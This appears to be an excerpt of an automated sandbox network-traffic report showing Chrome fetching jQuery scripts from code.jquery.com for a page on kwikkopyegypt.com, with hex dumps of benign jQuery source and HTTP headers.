                                                                                                    Data Ascii: {return slice.call( this );}// Return just the one element from the setreturn num < 0 ? this[ num + this.length ] : this[ num ];},// Take an array of elements and push it onto the stack// (returning the new matched element set)pushS
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 65 72 79 2e 66 6e 2e 65 78 74 65 6e 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 76 61 72 20 6f 70 74 69 6f 6e 73 2c 20 6e 61 6d 65 2c 20 73 72 63 2c 20 63 6f 70 79 2c 20 63 6f 70 79 49 73 41 72 72 61 79 2c 20 63 6c 6f 6e 65 2c 0a 09 09 74 61 72 67 65 74 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 20 30 20 5d 20 7c 7c 20 7b 7d 2c 0a 09 09 69 20 3d 20 31 2c 0a 09 09 6c 65 6e 67 74 68 20 3d 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 0a 09 09 64 65 65 70 20 3d 20 66 61 6c 73 65 3b 0a 0a 09 2f 2f 20 48 61 6e 64 6c 65 20 61 20 64 65 65 70 20 63 6f 70 79 20 73 69 74 75 61 74 69 6f 6e 0a 09 69 66 20 28 20 74 79 70 65 6f 66 20 74 61 72 67 65 74 20 3d 3d 3d 20 22 62 6f 6f 6c 65 61 6e 22 20 29 20 7b 0a 09 09 64 65 65 70 20 3d 20 74 61 72 67 65 74 3b
                                                                                                    Data Ascii: ery.fn.extend = function() {var options, name, src, copy, copyIsArray, clone,target = arguments[ 0 ] || {},i = 1,length = arguments.length,deep = false;// Handle a deep copy situationif ( typeof target === "boolean" ) {deep = target;
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 65 2c 20 63 6f 70 79 20 29 3b 0a 0a 09 09 09 09 2f 2f 20 44 6f 6e 27 74 20 62 72 69 6e 67 20 69 6e 20 75 6e 64 65 66 69 6e 65 64 20 76 61 6c 75 65 73 0a 09 09 09 09 7d 20 65 6c 73 65 20 69 66 20 28 20 63 6f 70 79 20 21 3d 3d 20 75 6e 64 65 66 69 6e 65 64 20 29 20 7b 0a 09 09 09 09 09 74 61 72 67 65 74 5b 20 6e 61 6d 65 20 5d 20 3d 20 63 6f 70 79 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 0a 09 7d 0a 0a 09 2f 2f 20 52 65 74 75 72 6e 20 74 68 65 20 6d 6f 64 69 66 69 65 64 20 6f 62 6a 65 63 74 0a 09 72 65 74 75 72 6e 20 74 61 72 67 65 74 3b 0a 7d 3b 0a 0a 6a 51 75 65 72 79 2e 65 78 74 65 6e 64 28 20 7b 0a 0a 09 2f 2f 20 55 6e 69 71 75 65 20 66 6f 72 20 65 61 63 68 20 63 6f 70 79 20 6f 66 20 6a 51 75 65 72 79 20 6f 6e 20 74 68 65 20 70 61 67 65 0a 09 65
                                                                                                    Data Ascii: e, copy );// Don't bring in undefined values} else if ( copy !== undefined ) {target[ name ] = copy;}}}}// Return the modified objectreturn target;};jQuery.extend( {// Unique for each copy of jQuery on the pagee
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 09 09 44 4f 4d 45 76 61 6c 28 20 63 6f 64 65 20 29 3b 0a 09 7d 2c 0a 0a 09 65 61 63 68 3a 20 66 75 6e 63 74 69 6f 6e 28 20 6f 62 6a 2c 20 63 61 6c 6c 62 61 63 6b 20 29 20 7b 0a 09 09 76 61 72 20 6c 65 6e 67 74 68 2c 20 69 20 3d 20 30 3b 0a 0a 09 09 69 66 20 28 20 69 73 41 72 72 61 79 4c 69 6b 65 28 20 6f 62 6a 20 29 20 29 20 7b 0a 09 09 09 6c 65 6e 67 74 68 20 3d 20 6f 62 6a 2e 6c 65 6e 67 74 68 3b 0a 09 09 09 66 6f 72 20 28 20 3b 20 69 20 3c 20 6c 65 6e 67 74 68 3b 20 69 2b 2b 20 29 20 7b 0a 09 09 09 09 69 66 20 28 20 63 61 6c 6c 62 61 63 6b 2e 63 61 6c 6c 28 20 6f 62 6a 5b 20 69 20 5d 2c 20 69 2c 20 6f 62 6a 5b 20 69 20 5d 20 29 20 3d 3d 3d 20 66 61 6c 73 65 20 29 20 7b 0a 09 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 20
                                                                                                    Data Ascii: DOMEval( code );},each: function( obj, callback ) {var length, i = 0;if ( isArrayLike( obj ) ) {length = obj.length;for ( ; i < length; i++ ) {if ( callback.call( obj[ i ], i, obj[ i ] ) === false ) {break;}}}
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 62 61 63 6b 45 78 70 65 63 74 20 3d 20 21 69 6e 76 65 72 74 3b 0a 0a 09 09 2f 2f 20 47 6f 20 74 68 72 6f 75 67 68 20 74 68 65 20 61 72 72 61 79 2c 20 6f 6e 6c 79 20 73 61 76 69 6e 67 20 74 68 65 20 69 74 65 6d 73 0a 09 09 2f 2f 20 74 68 61 74 20 70 61 73 73 20 74 68 65 20 76 61 6c 69 64 61 74 6f 72 20 66 75 6e 63 74 69 6f 6e 0a 09 09 66 6f 72 20 28 20 3b 20 69 20 3c 20 6c 65 6e 67 74 68 3b 20 69 2b 2b 20 29 20 7b 0a 09 09 09 63 61 6c 6c 62 61 63 6b 49 6e 76 65 72 73 65 20 3d 20 21 63 61 6c 6c 62 61 63 6b 28 20 65 6c 65 6d 73 5b 20 69 20 5d 2c 20 69 20 29 3b 0a 09 09 09 69 66 20 28 20 63 61 6c 6c 62 61 63 6b 49 6e 76 65 72 73 65 20 21 3d 3d 20 63 61 6c 6c 62 61 63 6b 45 78 70 65 63 74 20 29 20 7b 0a 09 09 09 09 6d 61 74 63 68 65 73 2e 70 75 73 68 28 20 65
                                                                                                    Data Ascii: backExpect = !invert;// Go through the array, only saving the items// that pass the validator functionfor ( ; i < length; i++ ) {callbackInverse = !callback( elems[ i ], i );if ( callbackInverse !== callbackExpect ) {matches.push( e
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 2c 20 6e 61 6d 65 20 29 20 7b 0a 09 63 6c 61 73 73 32 74 79 70 65 5b 20 22 5b 6f 62 6a 65 63 74 20 22 20 2b 20 6e 61 6d 65 20 2b 20 22 5d 22 20 5d 20 3d 20 6e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 0a 7d 20 29 3b 0a 0a 66 75 6e 63 74 69 6f 6e 20 69 73 41 72 72 61 79 4c 69 6b 65 28 20 6f 62 6a 20 29 20 7b 0a 0a 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 72 65 61 6c 20 69 4f 53 20 38 2e 32 20 6f 6e 6c 79 20 28 6e 6f 74 20 72 65 70 72 6f 64 75 63 69 62 6c 65 20 69 6e 20 73 69 6d 75 6c 61 74 6f 72 29 0a 09 2f 2f 20 60 69 6e 60 20 63 68 65 63 6b 20 75 73 65 64 20 74 6f 20 70 72 65 76 65 6e 74 20 4a 49 54 20 65 72 72 6f 72 20 28 67 68 2d 32 31 34 35 29 0a 09 2f 2f 20 68 61 73 4f 77 6e 20 69 73 6e 27 74 20 75 73 65 64 20 68 65 72 65 20 64 75 65 20 74
                                                                                                    Data Ascii: , name ) {class2type[ "[object " + name + "]" ] = name.toLowerCase();} );function isArrayLike( obj ) {// Support: real iOS 8.2 only (not reproducible in simulator)// `in` check used to prevent JIT error (gh-2145)// hasOwn isn't used here due t
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 6e 73 74 61 6e 63 65 20 6d 65 74 68 6f 64 73 0a 09 68 61 73 4f 77 6e 20 3d 20 28 7b 7d 29 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 0a 09 61 72 72 20 3d 20 5b 5d 2c 0a 09 70 6f 70 20 3d 20 61 72 72 2e 70 6f 70 2c 0a 09 70 75 73 68 5f 6e 61 74 69 76 65 20 3d 20 61 72 72 2e 70 75 73 68 2c 0a 09 70 75 73 68 20 3d 20 61 72 72 2e 70 75 73 68 2c 0a 09 73 6c 69 63 65 20 3d 20 61 72 72 2e 73 6c 69 63 65 2c 0a 09 2f 2f 20 55 73 65 20 61 20 73 74 72 69 70 70 65 64 2d 64 6f 77 6e 20 69 6e 64 65 78 4f 66 20 61 73 20 69 74 27 73 20 66 61 73 74 65 72 20 74 68 61 6e 20 6e 61 74 69 76 65 0a 09 2f 2f 20 68 74 74 70 73 3a 2f 2f 6a 73 70 65 72 66 2e 63 6f 6d 2f 74 68 6f 72 2d 69 6e 64 65 78 6f 66 2d 76 73 2d 66 6f 72 2f 35 0a 09 69 6e 64 65 78 4f 66 20 3d 20 66 75 6e
                                                                                                    Data Ascii: nstance methodshasOwn = ({}).hasOwnProperty,arr = [],pop = arr.pop,push_native = arr.push,push = arr.push,slice = arr.slice,// Use a stripped-down indexOf as it's faster than native// https://jsperf.com/thor-indexof-vs-for/5indexOf = fun


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.2453982151.101.130.1374436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:50:42 UTC667OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
                                                                                                    Host: code.jquery.com
                                                                                                    Connection: keep-alive
                                                                                                    Origin: https://kwikkopyegypt.com
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: script
                                                                                                    Referer: https://kwikkopyegypt.com/
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:50:42 UTC612INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 69597
                                                                                                    Server: nginx
                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                    ETag: "28feccc0-10fdd"
                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                    Accept-Ranges: bytes
                                                                                                    Age: 2270867
                                                                                                    Date: Mon, 10 Mar 2025 12:50:42 GMT
                                                                                                    X-Served-By: cache-lga21984-LGA, cache-ewr-kewr1740043-EWR
                                                                                                    X-Cache: HIT, HIT
                                                                                                    X-Cache-Hits: 507, 0
                                                                                                    X-Timer: S1741611042.405704,VS0,VE1
                                                                                                    Vary: Accept-Encoding
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                                                                                                    Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 5b 61 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 72 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 62 2c 63 2c 62 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61
                                                                                                    Data Ascii: [a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushSta
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6b 2e 63 61 6c 6c 28 61 29 29 26 26 28 21 28 62 3d 65 28 61 29 29 7c 7c 28 63 3d 6c 2e 63 61 6c 6c 28 62 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 62 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 26 26 6d 2e 63 61 6c 6c 28 63 29 3d 3d 3d 6e 29 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 66 6f 72 28 62 20 69 6e 20 61 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 61 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                                                                                                    Data Ascii: ject Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typ
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 6e 6f 77 2c 73 75 70 70 6f 72 74 3a 6f 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 72 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 63 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 72 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6a 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 62 2b 22 5d 22 5d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 29 7b 76 61 72 20 62 3d 21 21 61 26 26 22 6c 65
                                                                                                    Data Ascii: now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[object "+b+"]"]=b.toLowerCase()});function w(a){var b=!!a&&"le
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 4c 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 4c 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4e 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4b 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4b 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4b
                                                                                                    Data Ascii: ")"),CLASS:new RegExp("^\\.("+L+")"),TAG:new RegExp("^("+L+"|[*])"),ATTR:new RegExp("^"+M),PSEUDO:new RegExp("^"+N),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+K+"*(even|odd|(([+-]|)(\\d*)n|)"+K+"*(?:([+-]|)"+K+"*(\\d+)|))"+K
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 3d 3d 77 26 26 31 31 21 3d 3d 77 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d 77 26 26 28 6c 3d 5a 2e 65 78 65 63 28 61 29 29 29 69 66 28 66 3d 6c 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 77 29 7b 69 66 28 21 28 6a 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 29 72 65 74 75 72 6e 20 64 3b 69 66 28 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68 28 6a 29 2c 64 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6a 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 26 26 74 28 62 2c 6a 29 26 26 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68
                                                                                                    Data Ascii: ==w&&11!==w)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==w&&(l=Z.exec(a)))if(f=l[1]){if(9===w){if(!(j=b.getElementById(f)))return d;if(j.id===f)return d.push(j),d}else if(s&&(j=s.getElementById(f))&&t(b,j)&&j.id===f)return d.push
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 20 6d 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 63 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 63 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 63 29 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 62 3f 62 2e 70 61
                                                                                                    Data Ascii: ma(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function na(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function oa(a){return function(b){return"form"in b?b.pa
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 5f 2c 61 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29
                                                                                                    Data Ascii: getElementsByName||!n.getElementsByName(u).length}),c.getById?(d.filter.ID=function(a){var b=a.replace(_,aa);return function(a){return a.getAttribute("id")===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a)
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4b 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4b 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 4a 2b 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 75 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 7e 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 75 2b 22 2b 2a 22 29 2e
                                                                                                    Data Ascii: .push("[*^$]="+K+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+K+"*(?:value|"+J+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 64 3d 21 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 3f 64 3a 28 64 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 3d 3d 3d 28 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 29 3f 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 62 29 3a 31 2c 31 26 64 7c 7c 21 63 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75
                                                                                                    Data Ascii: e)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocu


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.2453981151.101.130.1374436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:50:42 UTC630OUTGET /jquery-3.1.1.min.js HTTP/1.1
                                                                                                    Host: code.jquery.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: script
                                                                                                    Referer: https://kwikkopyegypt.com/
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:50:42 UTC613INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 86709
                                                                                                    Server: nginx
                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                    ETag: "28feccc0-152b5"
                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                    Accept-Ranges: bytes
                                                                                                    Age: 2845273
                                                                                                    Date: Mon, 10 Mar 2025 12:50:42 GMT
                                                                                                    X-Served-By: cache-lga21947-LGA, cache-ewr-kewr1740033-EWR
                                                                                                    X-Cache: HIT, HIT
                                                                                                    X-Cache-Hits: 4188, 0
                                                                                                    X-Timer: S1741611042.400118,VS0,VE1
                                                                                                    Vary: Accept-Encoding
